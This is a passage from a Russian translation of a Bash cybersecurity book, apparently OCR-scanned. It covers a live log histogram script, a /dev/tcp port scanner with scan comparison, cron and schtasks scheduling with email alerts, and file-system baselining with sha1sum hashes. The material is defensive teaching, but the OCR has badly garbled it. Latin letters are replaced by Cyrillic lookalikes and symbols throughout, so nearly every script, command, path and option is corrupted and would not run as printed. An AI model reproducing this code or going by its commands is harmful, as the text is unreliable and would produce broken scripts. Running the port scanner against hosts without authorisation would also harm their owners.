и работает в фоновом режиме, все равно отправляет их в $64016. Поэтому мы пере- 
направляем данные из $&4ои% в $64егг. 


Подводя итог, мы видим, что, хотя функция 1оорег.ѕћ была помещена в фоновый 
режим, идентификатор ее процесса сохраняется в переменной оболочки. Каждые 
пять секунд сценарий а11соип* . ѕћ отправляет данному процессу (который выпол- 
няется в функции 1оорег.$П) сигнал $16581, который, в свою очередь, вызывает 
сценарий 1оорег. ѕһ, чтобы распечатать зафиксированное в нем текущее количество 
строк и перезапустить подсчет. После выхода сценарий Фаі1соипё. И очистится, 
отправив сигнал $Т6ТЕВМ в функцию 1оорег. ѕћ для ее прерывания. 


С помощью двух сценариев — сценария, выполняющего подсчет строк, и сцена- 
рия с секундомером (таймера), управляющего первым сценарием, — вы можете 
получить вывод (количество строк за определенный период), на основе которого 
следующий сценарий построит гистограмму. Он вызывается таким образом: 


БазПп +а11соипе.$Н | Базй 11\еБаг.$Н 


Сценарий 1імераг. И считывает данные из $64 и печатает вывод в $400, по одной 
строке для каждой строки ввода (пример 8.5). 


Пример 8.5. Ііуебаг.5ћ 


#1/бріп/Баѕћ - 

# 

Ваѕһ и кибербезопасность 
1іуебаг.ѕһ 


Описание: 
Создание горизонтальной гистограммы «живых» данных 


Использование: 
<оиёри+ Ғгот оЁһег ѕсгірё ог рговгат> | БазН 1імераг.ѕһ 


ЕЕЕ: :306:36:386:3 


Ғипсёіоп рг Баг () Ф 
{ 

Іоса1 гам тахгам ѕса1еа 

гам=$1 

тахгам=$2 

((ѕса1еа= (тахбаг*гам) /тахгам)) 
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((ѕса1еа == 0)) && °са1ед=1 # гарантированный минимальный размер 
Ғог((1=0; і<ѕса1еа; і++)) ; ао ргіпҒ '#' ; опе 
рпіпҒ '\п' 
} # рг_ Баг 
тахбағ=60 # наибольшее количество символов в строке Ө 
МАХ=60 
мһі1е геа дауѕї бітѕ+ афу 
до 
14 (( аку > МАХ )) © 
{Пеп 
Іеї МАХ=$ду+$а+у/4 # предоставляем немного места 
есһо " **** гезса11пв: МАХ=$МАХ" 
1 
ргіпЕ '%6.65 %6.65 %44:' $@ауѕі $їіпѕ+ $аїу ө 
рг_Баг Фафу $МАХ 
допе 


© Функция рг Баг выводит строку хештегов, масштабированных на основе предо- 
ставленных параметров до максимального размера. Эта функция может показаться 
знакомой, так как мы ранее уже использовали ее в сценарии 11$ о5гат. $Н. 


Ө Это самый длинный размер строки хештега, который мы можем допустить (что- 
бы обойтись без переноса строки). 


Ө Насколько большими будут значения, которые необходимо отобразить? Не зная 
этого заранее (хотя эти данные могут быть предоставлены сценарию в качестве аргу- 
мента), сценарий будет отслеживать максимум. Если этот максимум будет превышен, 
значение начнет «масштабироваться» и линии, которые выводятся сейчас, и будущие 
линии также будут масштабированы до нового максимума. Сценарий добавляет 25 % 
к максимальному значению, так что ему не придется масштабировать значение, если 
очередное новое значение каждый раз увеличивается только на 1-2 %. 


Ө рг1тЕ определяет минимальную и максимальную ширину первых двух полей, 
которые будут выведены. Это метки даты и времени, которые при превышении 
значений ширины будут обрезаны. Чтобы вывести значение целиком, указываем 
его ширину размером четыре символа. При этом, несмотря на ограничения, будут 
напечатаны все значения. Если количество символов в значениях будет меньше 
четырех, недостающие будут дополнены пробелами. 


Поскольку данный сценарий считывается из (Ат, вы можете запустить его само- 
стоятельно, чтобы увидеть, как он себя поведет. Вот пример: 


$ Базй 1імераг.ѕһ 
201010 1020 20 
201010 1020 20 : НННННННННННННННННННЕ 


Глава 8. Мониторинг журналов в режиме реального времени 143 


201010 1020 70 

**** реѕса1іпе: МАХ=87 
201010 1020 ГӨ:#9ННННННННННННННННННННННННННННЕННННННННННЕНННННННННЕ 
201010 1020 75 
201010 1020 75: ЯЯ ННННННЕНЯНННННННЕНННННННННЕННННННННЕНЕНННННННННЕНННННЕ 
^С 


В этом примере ввод смешивается с выводом. Вы также можете поместить ввод 
в файл и перенаправить его в сценарий, чтобы увидеть только вывод: 


$ Базй 11\уеБбаг.$И < фездафа. хе 
Базй 1іуераг.5һ < х.Яа+а 
201010 1020 20: НННННННННННННННННННЕ 

**** ге5са11п8: МАХ=87 
201010 1020 ТӨ: 99999999959 НЕНЕ НЕЕ НЕЕ ННН" 
201010 1020 7Б:ННННННННННННННННННННННННННЕНЕНЕННННННННННННННННЕНЕЕ 
$ 


Выводы 


Лог-файлы могут помочь разобраться в работе системы. Но они поступают в боль- 
ших количествах, что усложняет их анализ. Эту проблему можно свести к мини- 
муму, создав ряд сценариев для автоматического форматирования, агрегирования 
данных и создания оповещений. 


В следующей главе мы рассмотрим, как подобные методы можно использовать для 
мониторинга сетей и отслеживания изменений в конфигурации. 


Упражнения 


1. Чтобы установить интервал в секундах, добавьте в сценарий +а11соип* .5Н па- 
раметр -1. 

2. Добавьте в сценарий 1імебае.ѕћ параметр -М, чтобы определить ожидаемый 
максимум входного значения. Используйте для анализа ваших параметров 
встроенный анализатор аргументов веборі5. 


3. Как в сценарий 11уеБаг . $И добавить параметр -+, который будет фильтровать 
данные с помощью эгер? С какими проблемами вы можете столкнуться? Какой 
подход вы могли бы использовать для решения этих проблем? 


4. Измените файл міпаі1. ѕһ так, чтобы пользователь мог указать журнал 
МИп94о\з, который будет отслеживаться с помощью аргумента, переданного 
командной строке. 
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5. Измените файл міпёаі1.ѕһ так, чтобы добавить в него легкую систему обнару- 
жения вторжений с помощью ергер и файла ТОС. 


6. Рассмотрите утверждение, сделанное во врезке «Буферы командной строки» на 
с. 134: «Когда входные данные поступают из файла, обычно этот процесс идет 
быстро». Почему «обычно»? При каких условиях вы можете увидеть необхо- 
димость наличия в команде вгер опции буферизации строк даже при чтении из 
файла? 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ВЁрв: /\мммм/.гарсубегор$.сот/. 


Инструмент: мониторинг 
сети 


Раннее выявление вредоносных действий в сфере кибербезопасности повышает 
шанс быстро устранить эту опасность. Одним из таких методов обнаружения явля- 
ется мониторинг сети, определяющий появление новых или неожиданных сетевых 
служб (то есть открытых портов). Именно с помощью командной строки можно 
выявить вредоносные действия на раннем этапе. 


В этой главе мы создадим инструмент, позволяющий отслеживать по всей сети из- 
менения в открытых портах систем. Требования к инструменту следующие. 


1. Прочитать файл, содержащий ІР-адреса или имена хостов. 


2. Выполнить для каждого упоминавшегося в файле хоста сканирование сетевых 
портов и определить открытые порты. 


3. Сохранить вывод, полученный при сканировании портов, в файл. В имени этого 
файла должна быть указана текущая дата. 


4. При повторном запуске сценария снова должно выполняться сканирование 
портов, а затем полученные результаты необходимо сравнить с ранее сохра- 
ненным последним результатом. Выявленные изменения должны выделяться 
на экране. 


5. Автоматизировать ежедневный запуск сценария и при возникновении ка- 
ких-либо изменений отправлять системному администратору сообщение по 
электронной почте. 


Сканирование портов можно выполнить с помощью утилиты Мтар Ма. Но в целях 
обучения мы реализуем эту функцию, используя Баѕћ. Дополнительные сведения 
о Маш вы найдете по адресу ћрѕ://птар.ого/паіїё#. 
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Используемые команды 


В этой главе мы рассмотрим работу с командами сгопќар и зсНфа$К$. 


сгопёаб 


Команда сгоп+ар позволяет редактировать сгоп-таблицу в системе Глпих. Таблица 
сгоп используется для планирования задач по выполнению команд в определенное 
время или в определенный период времени. 


Общие параметры команды 


О -е — редактировать сгоп-таблицу. 


О -1 — вывести текущую сгоп-таблицу. 


О -г- удалить текущую сгоп-таблицу. 


5са$К$ 


Команда ѕсһёаѕкѕ позволяет планировать задачи в среде У\/ш4о\з, запуска- 
ющие выполнение необходимых команд в определенное время или промежуток 
времени. 


Общие параметры команды 


С /Сгеафе — запланировать новую задачу. 


С /ре1еїе — удалить запланированную задачу. 


Ц /Очегу — вывести список всех запланированных задач. 


Шаг 1. Создание сканера портов 


В первую очередь создадим сканер портов. Для этого нужно на определенном порту 
создать ТСР-соединение с определенным хостом. Это можно сделать с помощью 
файлового дескриптора Баѕћ, имя которого — /аеу/&ср. 


Для создания сканера портов сначала необходимо прочитать из файла список 
ТР-адресов или имен хостов. Далее будет предпринята попытка подключения 
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к ряду портов на хостах, упоминаемых в файле. В случае успешного подключения 
станет понятно, что порт открыт. Если время соединения истекло или вы получили 
сообщение о сбросе, значит, порт закрыт. Для этого проекта мы на каждом хосте 
отсканируем ТСР-порты с номерами от 1 до 1023 (пример 9.1). 


Пример 9.1. 5сап.5Н 


#!/61п/Ба$й - 

# 

Ваѕһ и кибербезопасность 
ѕсап.ѕћ 


Описание: 
Сканирование порта указанного хоста 


Использование: . /ѕсап.ѕһ <оиёри& +11е> 
<оиёри +11е> Файл, куда сохраняются результаты 


{Е жж 


ФипсЕ1оп ѕсап () 
{ 
ћоѕ1=$1 
регате '%5' "ФһоѕЕ" о 
Ғог ((рогі=1;рогі<1024; рогї++)) 
ао 
# порядок перенаправления важен по двум причинам 
есһо >/4еу/пи11 2>&1 < /ӣеу/+ср/${һоѕ+}/%{рогї} 
1Ғ (($? == 0)) ; +һеп реле ' %4' "${рогё}" ; +1 
допе 
есһо # или вывести '\п' 


ФФ 


— 


основной цикл 
читать имя каждого узла (из $441п) 
и искать открытые порты 
сохранить результаты в файл, 
имя которого указано в качестве аргумента, 
или задать имя по умолчанию на основе текущей даты 


{+ 


рг1пЕЕ -у ТОРАҮ '5зсап_%(#%Е)Т' -1 # например, ѕсап_ 2017-11-27 
ООТЕІІЕ=${1: -$ТОРАҮ} 


оо 


мһі1е геаа НОЅТМАМЕ 
ао 
ѕсап ФНОЅТМАМЕ 
допе > $ООТЕІІЕ ө 
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© Здесь обратите внимание на команды ргіпё#. Ни одна из них не разбивает вывод 
на несколько строк, чтобы сохранить код в одной (длинной) строке. 


Ө Это критический шаг в сценарии — фактически создание сетевого подключения 
к указанному порту. Подключение создается с помощью следующего кода: 


есһо >/4е\у/пи11 2>&1 < /аеу/+ср/%{һоѕї}/%{рог+і} 


Команда есһо здесь не имеет реальных аргументов, только перенаправления. 
Перенаправления обрабатываются оболочкой; команда есһо никогда не видит 
эти перенаправления, но знает, что они произошли. Без аргументов еспо в $406 
будет просто напечатан символ новой строки (\п). Поскольку здесь о выводе мы 
не заботимся, и $4о1и%, и $ 4етг перенаправляются в /аеу/пи11 (фактически от- 
брасываются). 


Ключевым моментом здесь является перенаправление $4 т (через <). Мы перена- 
правляем $64 т, чтобы он использовал специальное имя файла Баѕћ, /аем/+ср/... 
и некоторый номер хоста и порта. Поскольку есһо просто выполняет вывод, коман- 
да не будет читать какие-либо входные данные из этого специального сетевого фай- 
ла. Скорее, мы просто пытаемся его открыть (только для чтения), чтобы увидеть, 
есть ли там эти данные. 


© Это вторая команда ргіп+#. Если команда есһо выполняется успешно, значит, 
соединение с данным портом на указанном хосте успешно установлено. В этом 
случае мы выводим номер данного порта. 


© Функция ргіп+ (в более новых версиях Баѕћ) поддерживает специальный 
формат печати значений даты и времени. Символы %( )Т — это спецификатор фор- 
мата рг1п*+, который указывает, что это формат даты/времени. Строка в скобках 
содержит сведения о том, какие составляющие части даты и/или времени вы хо- 
тите показать. Здесь применены спецификаторы, которые будут использоваться 
в вызове системной библиотеки $+г1те. (Для более подробной информации 
введите ге 1те.) В этом случае %Е означает формат «год-месяц-день» (формат 
даты 180 8601). Дата/время печати определяется как -1, что означает «сейчас». 


Параметр -у команды рг1п*+ указывает, что вывод следует сохранить в переменной, 
а не выводить на экран. В этом случае в качестве переменной используется ТОрАҮ. 


© Если пользователь в качестве первого аргумента данного сценария указывает 
в командной строке файл вывода, будет использован этот аргумент. Если первый 
аргумент отсутствует, то в качестве имени файла вывода будет использоваться 
строка с текущей датой, только что созданная в ТОРАУ. 
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Ө Перенаправляя вывод в ӣопе, мы делаем это для всего кода внутри цикла мћі1е. 
Если бы было сделано перенаправление в самой команде сканирования, то, чтобы 
добавить вывод к файлу, мы должны были бы использовать символы >>. В против- 
ном случае при каждой итерации цикла сохраняется только один вывод команды, 
а предыдущий вывод блокируется. Если к файлу добавляется очередная команда, 
то перед началом цикла нам нужно будет этот файл обрезать. Таким образом, вы 
можете увидеть, что гораздо лучше просто выполнить перенаправление в цикл 
мһі1е. 


Файл вывода с результатами сканирования будет отформатирован так, что раз- 
делителем будет пробел. Каждая строка начинается с ІР-адреса или имени хоста, 
а затем перечисляются все открытые ТСР-порты. 


В примере 9.2 приведен вариант формата вывода, который показывает, что на хосте 
192.168.0.1 открыты порты 80 и 443, а на хосте 10.0.0.5 — порт 25. 


Пример 9.2. ѕсап_ 2018-11-27 


192.168.0.1 80 443 
10.0.0.5 25 


Шаг 2. Сравнение с предыдущим выводом 


Конечная цель, которой мы хотим достичь с помощью этого инструмента, — об- 
наружение изменений находящегося в сети хоста. Для этого нам необходимо со- 
хранять в файл результаты каждого сканирования. Далее — сравнить последнее 
сканирование с предыдущим результатом и обнаружить разницу между предыду- 
щим и текущим состояниями. В частности, мы будем искать устройство, у которого 
ТСР-порт открыт или закрыт. Определив состояние порта, вы можете выяснить, 
было ли это изменение санкционированным, или это признак злонамеренной ак- 
тивности. 


В примере 9.3 сравниваются результаты последней проверки с сохраненными 
в файле предыдущими результатами и выявляются даже самые незначительные 
изменения. 


Пример 9.3. #2.5һ 


#1/6ріп/Баѕћ - 
# 
# Ваѕһ и кибербезопасность 
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+42. ѕһ 


Описание: 

Сравнивает два результата сканирования портов для поиска изменений 
Основное предположение: оба файла имеют одинаковое количество строк, 
каждая строка с тем же адресом хоста, 

хотя перечисленные порты могут быть разными 


Использование: ./Ға2.5һ <+11е1> <+11е2> 


{Е Е Е-Е-Н-++- 


# найти "$_ООКЕОК" в списке аргументов для этой функции 
# возвращает гие (0), если его нет в списке 


Ғипсёіоп №+1пііѕЁ () © 
{ 
Фог рогі іп "$@" 
до 
1+ [[ $рогЕ == $100КРОВ ]] 
{Неп 
гефигп 1 
41 
допе 
геигп ө 
} 
мһі1е гие 
до 
геаа а11пе <84 || Бгеак # ЕОЕ ө 
геаа б1іпе <85 || Бгеак # ЕОЕ, для симметрии [3] 
# іғ [[ Фа1іпе == $61іпе ]] ; һеп сопЕ1тие; +1 
[[ $а11пе == $611те ]] && соп+іпие; [4] 
# есть разница, поэтому мы 
# подразделяем на хост и порты 
НОЅТА=${ а1іпе% *} [5] 
РОКТЅА=( ${а11пе#* } ) [6] 
НОЅТВ=${61іпе% *} 
РОКТ5В=( ${611пе#* } ) 
есһо ФНОЅТА # определяем хост, в котором произошли изменения 
Ғог рога іп ${РОКТЅА[0]} 
ао [7] 
[ООКРОК=ФрогЕа М№оТпЕ1$+ ${РОВТ$В[@]} && есһо " с1озе4: $рог+а" 
допе 


Фог рогЕЬ іп ${РОВТ$В[@]} 
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до 
[ООКЕОВ=ФрогЕБ Мо{ТпЕ1$+ Ф{РОКТЅА[0]} && есһо " пем: ФрогЕБ" 
допе 
допе 4< ${1:-дау1.Чафа} 5< ${2:-дау2.да+а} ө 


# 9ау1.дафа и Яӣау2.Яда+а являются именами по умолчанию, что упрощает тестирование 


© Функция № {ТпЕ15* написана так, чтобы возвращать значение, приравненное 
к гие или Ға15е. Помните, что в оболочке (за исключением значений в двойных 
скобках) ё считается истинным. (После выполнения команды возвращается @, когда 
ошибки не возникает; ненулевые возвращаемые значения обычно указывают на 
ошибку, поэтому считаются ложными.) 


Ө <Уловка» в этом сценарии заключается в том, что можно читать из двух разных 
потоков ввода. Для этого в сценарии мы используем файловые дескрипторы 4 
и 5. Здесь переменная а1іпе заполняется данными, прочитанными из файлового 
дескриптора 4. Мы вскоре увидим, где дескрипторы 4 и 5 получают свои данные. 
Символ &, который находится перед дескриптором файла 4, обозначает, что это 
дескриптор файла 4. Без символа & БазВ будет пытаться читать из файла с именем 4. 
После прочтения последней строки входных данных, когда мы достигнем конца 
файла, команда геаа возвращает ошибку. В этом случае будет выполнена команда 
бргеак, завершающая цикл. 


Ө Аналогично Б1іпе будет считывать свои данные из дескриптора 5. Поскольку 
предполагается, что два файла имеют одинаковое количество строк (то есть одни 
и те же хосты), то команда бгеак здесь тоже нужна, так как она выполняется и в пре- 
дыдущей строке. Такая симметрия делает файл более читаемым. 


Ө Если две строки идентичны, нет необходимости разбирать их на отдельные но- 
мера портов, поэтому мы сразу переходим к следующей итерации цикла. 


© Мы изолируем имя хоста, удалив все символы, находящиеся после первого про- 
бела (включая и сам первый пробел). 


© И наоборот, мы можем извлечь все номера портов, удалив имя хоста и все 
символы из начала строки вплоть до первого пробела (включая и сам первый 
пробел). Обратите внимание: мы не просто присваиваем этот список переменной, 
а используем скобки, чтобы инициализировать ее как массив, в котором каждая 
запись — номер порта. 


© Посмотрите на это выражение. За присвоением переменной в той же строке 
сразу идет команда еспо. Для оболочки это означает, что значение переменной 
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действительно только на время выполнения данной команды. К своему преды- 
дущему значению переменная возвращается сразу после выполнения команды. 
Вот почему мы в этой строке не повторяем $1_00КЕОК — это не будет действительным 
значением. Мы бы могли разделить это выражение на две отдельные команды — 
присваивание переменной и вызов функции. Но тогда бы вы не узнали об этой 
функции в Баѕћ. 


Ө Здесь демонстрируется новый вариант использования файловых дескрипто- 
ров. Файловый дескриптор 4 получает «перенаправление» для чтения входных 
данных из файла, указанного в первом аргументе сценария. Соответственно 
дескриптор 5 получает свои входные данные из второго аргумента. Если один 
или оба параметра не заданы, сценарий будет использовать имена, указанные по 
умолчанию. 


Шаг 3. Автоматизация и уведомление 


Хотя вы можете выполнять сценарий вручную, было бы гораздо лучше, если бы он 
автоматически запускался каждый день или каждые несколько дней и уведомлял 
вас о любых обнаруженных изменениях. Сценарий аиёоѕсап. $Н, показанный в при- 
мере 9.4, является единственным сценарием, использующим для сканирования сети 
и вывода любых изменений файлы ѕсап.ѕһ и #42. 5һ. 


Пример 9.4. аџѓоѕсап.ѕћ 
#1/бріп/баѕћ - 


# 

# Ваѕһ и кибербезопасность 

# аиёоѕсап. ѕћ 

# 

# Описание: 

# Автоматическое сканирование портов (с помощью сценария ѕсап.ѕћ) 
# Сравнение вывода с предыдущими результатами и е-та11 пользователя 
# Предполагается, что сценарий ѕсап.ѕћ находится в текущем каталоге 
# 

# Использование: . /аиёоѕсап.ѕһ 

# 

./ѕсап.ѕһ < һоѕЁ115+ о 
ЕІІЕГ157=$(15 ѕсап * | %а11 -2) [2] 


ЕТЬЕ$=( ФЕТЬЕЁТЬТ ) 


ТМРЕТЕЕ=$ (етр#і1е) [3] 
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./+02.5һ ${ЕТЬЕЗ[0]} Ф{Е11Е5[1]} > ФТМРЕТЕЕ 


1+ [[ -5 ФТМРЕШЕ ]] # не пустой ө 
{Пеп 

есһо "та111п8 +одау'ѕ рогі 41+Регепсе$ бо $05ЕК" 

та11 -ѕ "+одау'5 рогі 491++егепсез" $05ЕК < $ТМРЕПЕ Ө 


+1 
# очистка 
гм -Е ФТМРЕТЬЕ ө 


© При выполнении сценария $сап. $! будут проверены все хосты, находящиеся 
в файле с именем һоѕ+11іѕ+. Поскольку сценарию $сап. И имя файла в качестве 
аргумента мы не предоставляем, это имя сценарий сгенерирует сам. При этом ис- 
пользуется числовой формат «год-месяц-день». 


Ө Проименованные файлы, выводимые из сценария ѕсап. $Н, по умолчанию будут 
отсортированы. Команда 1$ вернет эти файлы в порядке, определенном датами 
их создания. При этом не потребуется указывать команде 1$ какие-либо специ- 
альные параметры. Используя команду +аі1, мы получим два последних имени 
из данного списка. Чтобы облегчить разделение на две части, поместим имена 
в массив. 


© Создание с помощью команды %етр+11е временного имени файла — самый 
надежный способ убедиться, что файл не используется или не может быть за- 
писан. 


Ө С помощью параметра -5 проверяется размер файла: если он больше нуля, 
значит, файл не пустой. Временный файл не будет пустым, если при сравнении 
его размера с размером файла #42 .5ћ обнаружится разница. 


Ө Для переменной $05ЕК автоматически устанавливается идентификатор поль- 
зователя, однако, если адрес электронной почты отличается от идентификатора 
пользователя, в эту переменную может потребоваться поместить другое зна- 
чение. 


© Существуют более надежные способы убедиться, что файл удален, независимо 
от того, где и когда сценарий будет завершен. Но это минимум, позволяющий 
предотвратить накопление рабочих файлов. Сценарии захвата, использующие 
встроенную команду «гар, вы найдете далее. 


В операционной системе УУіпіоуѕ запуск сценария аџиёоѕсап. $Н с заданным интер- 
валом можно настроить с помощью команды ѕсһёаѕкѕ. Для запуска этого сценария 
в Ипих с заданным интервалом следует воспользоваться командой сгоп*аб. 


154 Часть П • Защитные операции с использованием Ббаѕћ 


Планирование задачи в Ипих 


Чтобы запланировать выполнение задачи в Глпих, сначала нужно перечислить все 
существующие файлы сгоп: 


$ сгопфаБ -1 


по сгопфаб Фог раи1 


Как вы можете убедиться, файла сгоп пока не существует. Для создания и редак- 
тирования нового файла сгоп укажите параметр -е: 


$ сгоп+аб -е 


по сгопфаБ Фог раи1 - иѕіпе ап етрфу опе 
Ѕе1есі ап еаіїог. То сһапре 1афег, гип '5е1есф-еа1Фог'. 
1. /біп/еа 
2. /біп/папо <---- еаѕіеѕі 
3. /иѕг/біп/міт.баѕіс 
4. /изг/Б1пт/м1т. Е1пу 
Сһооѕе 1-4 [2]: 


В любом редакторе добавьте в файл сгоп следующую строку, чтобы сценарий 
аиіоѕсап. $П запускался в 08:00 утра каждый день: 


6 8 * * * /поме/раи1 /аифо$сап. $В 
Первые пять элементов определяют дату и время, когда будет выполняться зада- 


ча, а шестой элемент — это команда или файл, которые должны быть выполнены. 
В табл. 9.1 описаны поля файла сгоп и их допустимые значения. 


Для выполнения сценария аџќоѕсап.ѕћ в качестве команды (вместо использования 
Базй аџќо сап.5П) необходимо предоставить ему соответствующие полномочия. 
Например, с помощью строки сһтоа 750/поте/рац/ацоссап.5Н владельцу файла 
(возможно, Рац!) предоставляются права на чтение, запись и выполнение, а также 
разрешение на чтение и выполнение для группы и никаких других разрешений. 


Таблица 9.1. Поля файла сгоп 


Поле Разрешенные значения Пример Значение 
Минута 0—59 0 00 минут 
Час 0-23 8 8 часов 

День месяца 1-31 ы Любой день 
Месяц 1-12, Јапџагу — Оесетьег, Јап — рес | Маг Март 

День недели 1-7, Мопаау — Зипдау, Моп-бип 1 Понедельник 
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В примере, показанном в табл. 9.1, выполнение задачи начинается каждый поне- 
дельник марта, в 08:00 утра. В любом поле может быть установлено значение *, что 
эквивалентно любому значению. 


Планирование задач в Міпаоуѕ 


Запланировать автоматический запуск сценария аџёоѕсап. 5! в \/ш4о\$ немного 
сложнее, так как изначально этот сценарий не будет работать из командной строки. 
Вместо этого вам нужно запланировать запуск Сі Ваѕћ и в качестве аргумента ука- 
зать файл аџёоѕсап. ѕћ. Чтобы в системе \Лп4о\уз запланировать запуск сценария 
аиоѕсап. $Н каждый день в 08:00, напишите следующее: 


ѕсһёаѕкѕ //Сгеафе //ТМ "МефмогК $саппег" //5С БАТЕУ //5Т 08:00 
//ТВ "С:\Узег$\Раи1\АррВафа\Ёоса1\Ргоёгат$\61{\51{-БазН.ехе 
С: \Оѕегѕ\Раи1\аиёоѕсап." 


Обратите внимание: чтобы задача выполнялась правильно, нужно точно указать 
путь к СЁ Ва$В и сценарию аибоѕсап. $1. При указании параметров обязательно 
используйте двойной слеш, так как сценарий будет выполняться не из командной 
строки УЛп4о\$, а из СЁ ВазВ. В табл. 9.2 подробно описывается значение каждого 
из параметров. 


Таблица 9.2. Параметры команды ѕсһќаѕкѕ 


Параметр Описание 


//Стеабе Создание новой задачи 
И/ТМ Имя задачи 
//$С Частота расписания. Допустимые значения: минута, час, день, неделя, месяц, 


единожды при запуске, при входе в систему, при простое, при событии 


//8Т Время запуска 
//ТК Задание для выполнения 
Выводы 


Способность обнаруживать отклонения от установленного базового уровня является 
одной из самых эффективных при выявлении аномальной активности. Неожидан- 
ное открытие системой порта сервера может указывать на наличие сетевого бэкдора 
(Баскаоог). В следующей главе мы рассмотрим, как для обнаружения в локальной 
файловой системе подозрительной активности можно использовать определение 
исходного состояния этой системы. 
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Упражнения 


Попробуйте расширить и настроить функционал инструмента мониторинга сети, 
добавив следующие возможности. 


1. При сравнении двух отсканированных файлов следует учитывать разницу в их 
размерах или разницу в наборах ІР-адресов/имен хостов. 
2. Используйте /деу/+ср для создания простейшего $МРТ-клиента, чтобы сцена- 


рий не требовал наличия команды та11. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ПИрь: //млмм.гарасубегор$.сот/. 


Инструмент: контроль 
файловой системы 


Заражение файловой системы целевого объекта вредоносными программами 
и другие вторжения часто обнаруживаются по изменениям, которые вредоносные 
программы вносят в эту файловую систему. Для идентификации файлов, которые 
были добавлены, удалены или изменены, можно использовать свойства крип- 
тографической хеш-функции и возможности командной строки. Эта методика 
может быть наиболее эффективной в таких системах, как серверы или встраива- 
емые устройства, которые на регулярной основе не претерпевают существенных 
изменений. 


В этой главе мы разработаем инструмент для создания в файловой системе базо- 
вого файла, в котором зафиксируем текущее состояние файловой системы. Далее, 
используя этот базовый файл, мы сравним зафиксированное состояние системы 
с более поздним и определим, были ли файлы добавлены, удалены или изменены. 
Для этого требуется следующее. 

1. Записать путь к каждому файлу в данной системе. 


Создать для каждого файла этой системы хеш ЅНА-1. 


3. Повторно запустить инструмент и вывести имена всех файлов, которые были 
изменены, удалены, перемещены, или имена новых файлов. 


Используемые команды 


В этой главе для сравнения файлов мы воспользуемся командой $91++. 


ѕаі# 


Команда $41++ сравнивает два файла, находящихся рядом, и показывает все их 
различия. 
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Общие параметры команды 
О -а — рассматривать все файлы как текстовые. 
О -1 — игнорировать регистр. 


О -5 — удалять общие строки для двух файлов. 


О -м — определить максимальное количество символов для вывода в строке. 
Пример команды 


Чтобы сравнить два файла и вывести только строки, которые отличаются, введите 
следующее: 


$А1++ -5 +11е1.+хе Ғі1е2.1хі 


Шаг 1. Определение исходного состояния 
файловой системы 


Определение исходного состояния файловой системы включает в себя вычисление 
цифровой последовательности сообщения (хеш-значения) каждого файла, находя- 
щегося в настоящее время в системе, и запись результатов в файл. Для определения 
исходного состояния вы можете использовать команды +1п9 и ѕһа15ит: 


ЅҮЅМАМЕ="$(ипате -п)_$(да%фе +'#м_%а_%\')" ; зиао Ғіпа / -+уре + | 
хагвѕ -ӣ '\п' ѕһа15ит > ${5У$МАМЕ} Базе11пе.+хЕ 2>${5У$МАМЕ} _еггог. хе 


Чтобы обеспечить доступ ко всем файлам, при работе в операционной системе 
Глпах мы используем команду зидо. Для каждого найденного файла вычисляем 
хеш $НА1 с помощью $На1зит, но ѕ$ћа15ит вызываем командой хагв$. Она помещает 
в командную строку ѕһа1ѕип столько имен файлов (входных данных, которые она 
считывает из конвейера), сколько может (ограничивается памятью). Это будет 
намного эффективнее, чем вызывать команду ѕһа11ѕит для каждого отдельно- 
го файла. Вместо этого данная команда будет вызываться один раз на каждые 
1000 файлов или более (в зависимости от длины пути). Мы перенаправляем 
вывод в файл, содержащий как имя системы, так и текущую дату, — это важная 
информация для целей организации и определения времени. Мы также перена- 
правляем все сообщения об ошибках в отдельный файл журнала, который можно 
просмотреть позже. 


В примере 10.1 показан созданный базовый файл вывода. Первый столбец содержит 
хеш ЅНАЇ, а второй столбец — файл, который представляет данный хеш. 
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Пример 10.1. Базете же 


3а52се7809504449969792а2559с451947ее8с727 /.51{Кеер 
а64е53+4а1а936еа2061сс92+ес90616сас89189 /ацфозсап.$И 
сс656с521+4166814529сс67е63282е041а7044е /Ға2.5һ 
Баеа954695731с68аебе45691е252е645609с4с45 /1рѕ.1хї 
3343890486872а533002634473+8с29+а09е+с50 /1оса1һоѕі 


При использовании в СЁ Ваѕћ команды $Ва15ит в файле вывода в начале 
файлового пути часто добавляется символ *. Это может помешать в дальнейшем 
использовать базовый файл для выявления изменений. Можно направить вывод 
Ѕһаіѕит в команду $е4, чтобы удалить первое вхождение символа *: 


ѕеа '$/*//' 


Для достижения наилучших результатов желательно провести определение исход- 
ного состояния файловой системы, когда система находится в заведомо хорошей 
конфигурации, например, когда стандартная операционная система, приложения 
и исправления только что были установлены. Это гарантирует, что вредоносные 
программы или другие нежелательные файлы не станут частью файла, в котором 
зафиксировано исходное состояние системы. 


Шаг 2. Обнаружение изменений в исходном 
состоянии системы 


Чтобы обнаружить изменения в системе, необходимо сравнить ранее записанное 
исходное состояние системы с ее текущим состоянием. При сравнении происхо- 
дит пересчет вычисленной цифровой последовательности сообщения (хеша) для 
каждого файла, находящегося в системе, и сравнение вновь полученного значения 
с последним, ранее зафиксированным значением (в базовом файле). Если значения 
различаются, значит, файл, хеш которого проверяется, претерпел изменения. Если 
файл упоминается в базовом списке, но в системе отсутствует, следовательно, он 
был удален, перемещен или переименован. Если файл в системе существует, но 
в базовом списке отсутствует, можно предположить, что это новый файл или файл, 
который был перемещен или переименован. 


Команда ѕһа15ит хороша тем, что, если вы просто используете параметр -с, она сде- 
лает большую часть работы за вас. С помощью этой опции ѕћа15ит будет считывать 
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в файл ранее созданные дайджесты сообщений и пути и проверять, совпадают ли 
хеш-значения. Чтобы отобразить только несовпадающие файлы, используйте па- 
раметр --ди1е*: 


$ ѕһа15ит -с --аи1ее Базе11пе. хе 


ѕһа15ит: /Ноте/Чауе/+11е1.+хе: № ѕисһ Ғі1е ог Яігесїогу 1] 
/поте/дауе/+11е1.+х*: ҒАІІЕР ореп ог геаа ө 
/поте/даме/+11е2.+х+: ЕАТЕЕР Ө 

Ѕһа15ит: МАВМТ№: 1 1іѕ+еа +11е сои1а поф Бе геаа 

ѕһа15ит: МАКМІМС: 2 сотри&еа сһескѕитѕ 414 МОТ та&сһ 


© Здесь отображаются выходные данные з64егг, указывающие на то, что файл 
больше недоступен. Это связано с перемещением, удалением или переименованием 
файла. Вывод можно скрыть, перенаправив $4етг в файл или /аеу/пи11. 


Ө Это сообщение $401, информирующее, что указанный файл не найден. 


Ө Данное сообщение означает, что файл, указанный в Баѕе1іпе.х+, найден, но 
дайджест сообщения не совпадает, то есть файл каким-то образом изменился. 


